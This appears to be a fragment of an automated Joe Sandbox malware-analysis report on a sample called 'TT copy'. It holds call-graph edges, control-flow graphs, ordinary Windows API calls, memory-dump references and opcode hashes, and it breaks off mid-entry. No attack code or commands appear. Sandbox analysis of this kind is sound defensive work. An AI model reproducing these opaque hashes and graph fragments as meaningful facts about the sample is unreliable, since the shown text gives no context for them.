23925->23926 23928 e5b7ba 23925->23928 23926->23923 23930 e5b7e9 23928->23930 23929 e5b80d 23929->23926 23930->23929 23933 e5b967 23930->23933 23937 e5b978 23930->23937 23935 e5b985 23933->23935 23934 e5b9bf 23934->23929 23935->23934 23941 e5a4bc 23935->23941 23939 e5b985 23937->23939 23938 e5b9bf 23938->23929 23939->23938 23940 e5a4bc 2 API calls 23939->23940 23940->23938 23942 e5a4c7 23941->23942 23944 e5c6b8 23942->23944 23945 e5bccc 23942->23945 23944->23944 23946 e5bcd7 23945->23946 23947 e55970 2 API calls 23946->23947 23948 e5c727 23946->23948 23947->23948 23952 e5e4b0 23948->23952 23958 e5e498 23948->23958 23949 e5c760 23949->23944 23954 e5e52d 23952->23954 23955 e5e4e1 23952->23955 23953 e5e4ed 23953->23949 23954->23949 23955->23953 23956 e5e920 LoadLibraryExW GetModuleHandleW 23955->23956 23957 e5e930 LoadLibraryExW GetModuleHandleW 23955->23957 23956->23954 23957->23954 23959 e5e52d 23958->23959 23961 e5e4e1 23958->23961 23959->23949 23960 e5e4ed 23960->23949 23961->23960 23962 e5e920 LoadLibraryExW GetModuleHandleW 23961->23962 23963 e5e930 LoadLibraryExW GetModuleHandleW 23961->23963 23962->23959 23963->23959 23964 e5ba90 GetCurrentProcess 23965 e5bb03 23964->23965 23966 e5bb0a GetCurrentThread 23964->23966 23965->23966 23967 e5bb47 GetCurrentProcess 23966->23967 23968 e5bb40 23966->23968 23969 e5bb7d 23967->23969 23968->23967 23970 e5bba5 GetCurrentThreadId 23969->23970 23971 e5bbd6 23970->23971

                                                                                                            Executed Functions

                                                                                                            Function 06EB8998 Relevance: 3.5, Strings: 2, Instructions: 983COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 38 6eb8998-6eb89b9 39 6eb89bb 38->39 40 6eb89c0-6eb8ab4 38->40 39->40 42 6eb8aba-6eb8c11 40->42 43 6eb91bc-6eb91e4 40->43 87 6eb918a-6eb91b9 42->87 88 6eb8c17-6eb8c72 42->88 46 6eb98cd-6eb98d6 43->46 48 6eb98dc-6eb98f3 46->48 49 6eb91f2-6eb91fb 46->49 50 6eb91fd 49->50 51 6eb9202-6eb92bc 49->51 50->51 66 6eb92c3-6eb92e3 51->66 68 6eb92e9-6eb92f6 66->68 70 6eb92f8-6eb9304 68->70 71 6eb9320 68->71 72 6eb930e-6eb9314 70->72 73 6eb9306-6eb930c 70->73 74 6eb9326-6eb9346 71->74 76 6eb931e 72->76 73->76 79 6eb9348-6eb93a1 74->79 80 6eb93a6-6eb9420 74->80 76->74 91 6eb98ca 79->91 99 6eb9422-6eb9475 80->99 100 6eb9477-6eb94ba 80->100 87->43 96 6eb8c77-6eb8c82 88->96 97 6eb8c74 88->97 91->46 98 6eb909c-6eb90a2 96->98 97->96 101 6eb90a8-6eb9125 98->101 102 6eb8c87-6eb8ca5 98->102 128 6eb94c5-6eb94cb 99->128 100->128 145 6eb9174-6eb917a 101->145 105 6eb8cfc-6eb8d11 102->105 106 6eb8ca7-6eb8cab 102->106 110 6eb8d18-6eb8d2e 105->110 111 6eb8d13 105->111 106->105 108 6eb8cad-6eb8cb8 106->108 115 6eb8cee-6eb8cf4 108->115 112 6eb8d30 110->112 113 6eb8d35-6eb8d4c 110->113 111->110 112->113 117 6eb8d4e 113->117 118 6eb8d53-6eb8d69 113->118 120 6eb8cba-6eb8cbe 115->120 121 6eb8cf6-6eb8cf7 115->121 117->118 125 6eb8d6b 118->125 126 6eb8d70-6eb8d77 118->126 123 6eb8cc0 120->123 124 6eb8cc4-6eb8cdc 120->124 127 6eb8d7a-6eb8fa0 121->127 123->124 129 6eb8cde 124->129 130 6eb8ce3-6eb8ceb 124->130 125->126 126->127 136 6eb8fa2-6eb8fa6 127->136 137 6eb9004-6eb9019 127->137 132 6eb9522-6eb952e 128->132 129->130 130->115 133 6eb94cd-6eb94ef 132->133 134 6eb9530-6eb95b8 132->134 139 6eb94f1 133->139 140 6eb94f6-6eb951f 133->140 170 6eb973d-6eb9746 134->170 136->137 144 6eb8fa8-6eb8fb7 136->144 141 6eb901b 137->141 142 6eb9020-6eb9041 137->142 139->140 140->132 141->142 149 6eb9048-6eb9067 142->149 150 6eb9043 142->150 151 6eb8ff6-6eb8ffc 144->151 147 6eb917c-6eb9182 145->147 148 6eb9127-6eb9171 145->148 147->87 148->145 155 6eb9069 149->155 156 6eb906e-6eb908e 149->156 150->149 152 6eb8fb9-6eb8fbd 151->152 153 6eb8ffe-6eb8fff 151->153 162 6eb8fbf-6eb8fc3 152->162 163 6eb8fc7-6eb8fe8 152->163 161 6eb9099 153->161 155->156 157 6eb9090 156->157 158 6eb9095 156->158 157->158 158->161 161->98 162->163 164 6eb8fea 163->164 165 6eb8fef-6eb8ff3 163->165 164->165 165->151 171 6eb95bd-6eb95d2 170->171 172 6eb974c-6eb97a7 170->172 173 6eb95db-6eb9731 171->173 174 6eb95d4 171->174 187 6eb97a9-6eb97dc 172->187 188 6eb97de-6eb9808 172->188 192 6eb9737 173->192 174->173 175 6eb966b-6eb96ab 174->175 176 6eb95e1-6eb9621 174->176 177 6eb96b0-6eb96f0 174->177 178 6eb9626-6eb9666 174->178 175->192 176->192 177->192 178->192 196 6eb9811-6eb987e 187->196 188->196 192->170 199 6eb9884-6eb98a4 196->199 200 6eb98ab-6eb98c3 199->200 200->91
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 2W(7$UUUU
                                                                                                            • API String ID: 0-573100206
                                                                                                            • Opcode ID: 906dfd8ef1e6c45c1a55f5eaaed4edac095541e7c64d19d4e89dccf9f15d680c
                                                                                                            • Instruction ID: f33af4c7fb881d50e587f177ce9d2e9dad9f795e1b16cea9568db7347ee65ac9
                                                                                                            • Opcode Fuzzy Hash: 906dfd8ef1e6c45c1a55f5eaaed4edac095541e7c64d19d4e89dccf9f15d680c
                                                                                                            • Instruction Fuzzy Hash: B1A2C575A00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB326D7319E81CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB2C88 Relevance: .3, Instructions: 267COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 674ab30ff185a535bcca023b06af56a47d8c791f2f84dcc9bb0266cf8c9e98a0
                                                                                                            • Instruction ID: e8bc64c2860c132d3082f3c17a38310c3d47db32c044d18184781d42e16afa3e
                                                                                                            • Opcode Fuzzy Hash: 674ab30ff185a535bcca023b06af56a47d8c791f2f84dcc9bb0266cf8c9e98a0
                                                                                                            • Instruction Fuzzy Hash: 06A14870E042498FDB45CFE9C4446EEFBB6AF89314F24F129D618AB216E7349A41CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB2C78 Relevance: .2, Instructions: 213COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ab509a0016b9bdb66da8e08c970691e6fba0ade16128c0c811a0f244e6e3b506
                                                                                                            • Instruction ID: 10eb34e662e04b3a03f2be997d1c4cd8d617d7b0d408876387bcbf8d4a8acad7
                                                                                                            • Opcode Fuzzy Hash: ab509a0016b9bdb66da8e08c970691e6fba0ade16128c0c811a0f244e6e3b506
                                                                                                            • Instruction Fuzzy Hash: 97812974E042498FDB45CFEAC4446EEBBF6AF88314F14F129D618AB316E7349A428F50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB2C85 Relevance: .2, Instructions: 212COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9b767772825597f79e93091f44533ef4302a0f3e7f943a14f16bc8bbceb25baf
                                                                                                            • Instruction ID: 528c3d4d9f0c9a8e634e34cf65ca04c7b444ac0d9156ed984ac9e290a576eae3
                                                                                                            • Opcode Fuzzy Hash: 9b767772825597f79e93091f44533ef4302a0f3e7f943a14f16bc8bbceb25baf
                                                                                                            • Instruction Fuzzy Hash: E1811974E042498FDB45CFEAC4446EEBBF6AF89314F14F029D519AB316E7349A418F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5BA81 Relevance: 6.1, APIs: 4, Instructions: 126threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BAF0
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00E5BB2D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BB6A
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5BBC3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: e50a9ba440a9b81e11fadc62f072cf2b04cb06fecd5a4a8c2300631dff78b815
                                                                                                            • Instruction ID: 515b97b1db6399c6a4af77013ce378433a09b6ebc35af96045d3c7511079b189
                                                                                                            • Opcode Fuzzy Hash: e50a9ba440a9b81e11fadc62f072cf2b04cb06fecd5a4a8c2300631dff78b815
                                                                                                            • Instruction Fuzzy Hash: B75177B09043498FDB54CFA9C588BEEBBF0BF88314F24845AE489B7250C7789944CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5BA90 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BAF0
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00E5BB2D
                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00E5BB6A
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E5BBC3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$ProcessThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2063062207-0
                                                                                                            • Opcode ID: 156e0bae131f533e73f275fd0adcd86340c73afb754497c857b2c72f06bd5470
                                                                                                            • Instruction ID: e07d3120bdb519cc192b4a5889e3ec43548a8703dc525aede659c7c728e36162
                                                                                                            • Opcode Fuzzy Hash: 156e0bae131f533e73f275fd0adcd86340c73afb754497c857b2c72f06bd5470
                                                                                                            • Instruction Fuzzy Hash: 325165B09042498FDB14DFAAC588BEEBBF0BF88314F24845AE489B7354C7749844CF65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E597A8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 201 e597a8-e597bd call e57494 204 e597d3-e597d7 201->204 205 e597bf 201->205 206 e597d9-e597e3 204->206 207 e597eb-e5982c 204->207 256 e597c5 call e59a20 205->256 257 e597c5 call e59a30 205->257 206->207 212 e5982e-e59836 207->212 213 e59839-e59847 207->213 208 e597cb-e597cd 208->204 211 e59908-e599c8 208->211 249 e599d0-e599fb GetModuleHandleW 211->249 250 e599ca-e599cd 211->250 212->213 215 e59849-e5984e 213->215 216 e5986b-e5986d 213->216 217 e59850-e59857 call e58adc 215->217 218 e59859 215->218 219 e59870-e59877 216->219 222 e5985b-e59869 217->222 218->222 223 e59884-e5988b 219->223 224 e59879-e59881 219->224 222->219 225 e5988d-e59895 223->225 226 e59898-e598a1 call e58aec 223->226 224->223 225->226 231 e598a3-e598ab 226->231 232 e598ae-e598b3 226->232 231->232 234 e598b5-e598bc 232->234 235 e598d1-e598d5 232->235 234->235 236 e598be-e598ce call e58afc call e58b0c 234->236 254 e598d8 call e59d01 235->254 255 e598d8 call e59d28 235->255 236->235 239 e598db-e598de 240 e59901-e59907 239->240 241 e598e0-e598fe 239->241 241->240 251 e59a04-e59a18 249->251 252 e599fd-e59a03 249->252 250->249 252->251 254->239 255->239 256->208 257->208
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E599EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: c1ba2c06bc7346598f318a48e0826bf1e9403f80baab4be13b9e68f3c2beccea
                                                                                                            • Instruction ID: 12757311f320baa7d1db34982a3f9bff37d52c0d2f3accbf44b840fcb838d7cf
                                                                                                            • Opcode Fuzzy Hash: c1ba2c06bc7346598f318a48e0826bf1e9403f80baab4be13b9e68f3c2beccea
                                                                                                            • Instruction Fuzzy Hash: 77713770A00B058FD764DF29C54179AB7F1FF88308F008A2ED89AE7A51DB35E849CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5557C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 258 e5557c-e55649 CreateActCtxA 260 e55652-e556ac 258->260 261 e5564b-e55651 258->261 268 e556ae-e556b1 260->268 269 e556bb-e556bf 260->269 261->260 268->269 270 e556c1-e556cd 269->270 271 e556d0 269->271 270->271 273 e556d1 271->273 273->273
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55639
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: de2a9a653271fe86bc6c0746541e235b3886c7558defb1580c846b0346ece47a
                                                                                                            • Instruction ID: 7a62cc46a694f529190066d1546124ef66af4e035ceac27d02abcd1b880738e2
                                                                                                            • Opcode Fuzzy Hash: de2a9a653271fe86bc6c0746541e235b3886c7558defb1580c846b0346ece47a
                                                                                                            • Instruction Fuzzy Hash: 37412471C04718CFDB24CFA9C844BDEBBB1BF88308F61856AD448AB251DBB5594ACF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E54060 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 274 e54060-e55649 CreateActCtxA 277 e55652-e556ac 274->277 278 e5564b-e55651 274->278 285 e556ae-e556b1 277->285 286 e556bb-e556bf 277->286 278->277 285->286 287 e556c1-e556cd 286->287 288 e556d0 286->288 287->288 290 e556d1 288->290 290->290
                                                                                                            APIs
                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00E55639
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: bcdeb3e074ee94f6befc6cca6869b399cde7e788bd5f7d744eb507067dc6bab5
                                                                                                            • Instruction ID: 7f5dd75b1a9f5d5548ac3b552370d369accb94a796940a40d6c1b159a835be85
                                                                                                            • Opcode Fuzzy Hash: bcdeb3e074ee94f6befc6cca6869b399cde7e788bd5f7d744eb507067dc6bab5
                                                                                                            • Instruction Fuzzy Hash: D1410171C04618CBDB20DFA9C88478EBBB1BF88308F658469D448BB251DBB5694ACF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5C0B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 291 e5c0b8-e5c0be 292 e5c0c0-e5c154 DuplicateHandle 291->292 293 e5c156-e5c15c 292->293 294 e5c15d-e5c17a 292->294 293->294
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5C147
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 05b1bb75fb38fb00209bf78bd0e071c90f0dcb12dde876eb8e47c80d327b29a6
                                                                                                            • Instruction ID: 16cab6b2191f4545df988e31be7815b47915ab0810cce955878157995ba2a6f7
                                                                                                            • Opcode Fuzzy Hash: 05b1bb75fb38fb00209bf78bd0e071c90f0dcb12dde876eb8e47c80d327b29a6
                                                                                                            • Instruction Fuzzy Hash: 5A2105B5901348AFDB10CFAAD584ADEBFF8EF48324F14841AE954A7310C374A954CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E5C0C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 297 e5c0c0-e5c154 DuplicateHandle 298 e5c156-e5c15c 297->298 299 e5c15d-e5c17a 297->299 298->299
                                                                                                            APIs
                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E5C147
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DuplicateHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 3793708945-0
                                                                                                            • Opcode ID: 8c8034b53563cdd3c940852080d174f30d482728ae2f34ce97e481b81ec4773d
                                                                                                            • Instruction ID: 7e3a2c3bdc769c2793391677f5063bb72f445e6c3555e15da145b1438f57b739
                                                                                                            • Opcode Fuzzy Hash: 8c8034b53563cdd3c940852080d174f30d482728ae2f34ce97e481b81ec4773d
                                                                                                            • Instruction Fuzzy Hash: 7A21E6B59003489FDB10CF99D584ADEBBF4FB48314F14841AE914B3310D374A944CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E58B38 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 302 e58b38-e59c50 304 e59c52-e59c55 302->304 305 e59c58-e59c87 LoadLibraryExW 302->305 304->305 306 e59c90-e59cad 305->306 307 e59c89-e59c8f 305->307 307->306
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E59A69,00000800,00000000,00000000), ref: 00E59C7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 279b60450fa611d7968529634af71681c95f1bd034ffa98fc093cc9a11072b5f
                                                                                                            • Instruction ID: 1360044357fad745972451a09c99746fa1d9575964155a97d4cf6b5ee5767117
                                                                                                            • Opcode Fuzzy Hash: 279b60450fa611d7968529634af71681c95f1bd034ffa98fc093cc9a11072b5f
                                                                                                            • Instruction Fuzzy Hash: 191103B29043499FCB10CF9AC444BDEFBF4EB88314F15842AE859B7201C374A949CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E59C09 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 310 e59c09-e59c50 311 e59c52-e59c55 310->311 312 e59c58-e59c87 LoadLibraryExW 310->312 311->312 313 e59c90-e59cad 312->313 314 e59c89-e59c8f 312->314 314->313
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E59A69,00000800,00000000,00000000), ref: 00E59C7A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 1029625771-0
                                                                                                            • Opcode ID: 5f0cf6a0f36f29944d1d6f5e970d8095b44832baf6f22bdf025ec59c419dac99
                                                                                                            • Instruction ID: 7ecd14598300a0e50157cc5a270e0c726c056b77531598b78a36b94284e97ad9
                                                                                                            • Opcode Fuzzy Hash: 5f0cf6a0f36f29944d1d6f5e970d8095b44832baf6f22bdf025ec59c419dac99
                                                                                                            • Instruction Fuzzy Hash: C11106B2D003499FCB10CF99C484BEEFBF4AB88314F15851AE819B7611C378A545CFA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00E59988 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 317 e59988-e599c8 318 e599d0-e599fb GetModuleHandleW 317->318 319 e599ca-e599cd 317->319 320 e59a04-e59a18 318->320 321 e599fd-e59a03 318->321 319->318 321->320
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00E599EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.287145616.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e50000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4139908857-0
                                                                                                            • Opcode ID: f8361538c1b4bc74409f75f4d848b19dd3f94f272a579bb7c2b03e586e7b18f4
                                                                                                            • Instruction ID: ea2758911958c5c9c837069e857f8ab817561a03d3e9d04a843250bc2e77a00d
                                                                                                            • Opcode Fuzzy Hash: f8361538c1b4bc74409f75f4d848b19dd3f94f272a579bb7c2b03e586e7b18f4
                                                                                                            • Instruction Fuzzy Hash: D7110FB1C003498FCB10CF9AC484BDEFBF4AB88324F15841AD859B7200D378A549CFA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EE0594 Relevance: 1.3, Strings: 1, Instructions: 12COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 323 6ee0594-6ee05ab 325 6ee05b7-6ee05be 323->325
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: )
                                                                                                            • API String ID: 0-2427484129
                                                                                                            • Opcode ID: 6c289bc4d2f98f897ca7a4602d3afda97f3caab2203e68c94c03e5469e359684
                                                                                                            • Instruction ID: c37dda04dcb06f87b04df4dbfe56f29514f918c53917b3b6adfcd650295e6d82
                                                                                                            • Opcode Fuzzy Hash: 6c289bc4d2f98f897ca7a4602d3afda97f3caab2203e68c94c03e5469e359684
                                                                                                            • Instruction Fuzzy Hash: D5D0C9B49019248FDB64DF60DD187ED77BABB48305F001198E00EA7270CB785D88CF50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EEF7D0 Relevance: .3, Instructions: 283COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293968631.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6ee0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 52554e73ca34f2881e55d349b21f77b8235b7d25795467a7e4a1e7a3fd431546
                                                                                                            • Instruction ID: 747ca203e26dbd90b2f4eabc4be0031f17049d22d5130ea5bd6fd18d8e4d33a9
                                                                                                            • Opcode Fuzzy Hash: 52554e73ca34f2881e55d349b21f77b8235b7d25795467a7e4a1e7a3fd431546
                                                                                                            • Instruction Fuzzy Hash: EDA1EB30B102159FDB54AF64D859BBE7BE6EB88309F149029F90ADB281DF74CD42CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB3008 Relevance: .2, Instructions: 188COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.293834062.0000000006EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6eb0000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0536ab6074dcab266e1a6f5f7975d757755c74f264d702cf47a26100f1198220
                                                                                                            • Instruction ID: 437d04be42e061496f90a337c6bd5f440485fb1465467d7fc057fe77d86d39ff
                                                                                                            • Opcode Fuzzy Hash: 0536ab6074dcab266e1a6f5f7975d757755c74f264d702cf47a26100f1198220
                                                                                                            • Instruction Fuzzy Hash: 70513530F083058FCB54DBB4C9526EFBAB6AF85218F15666DC516A7381EF318D028BD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 06EB1350 Relevance: .2, Instructions: 153COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
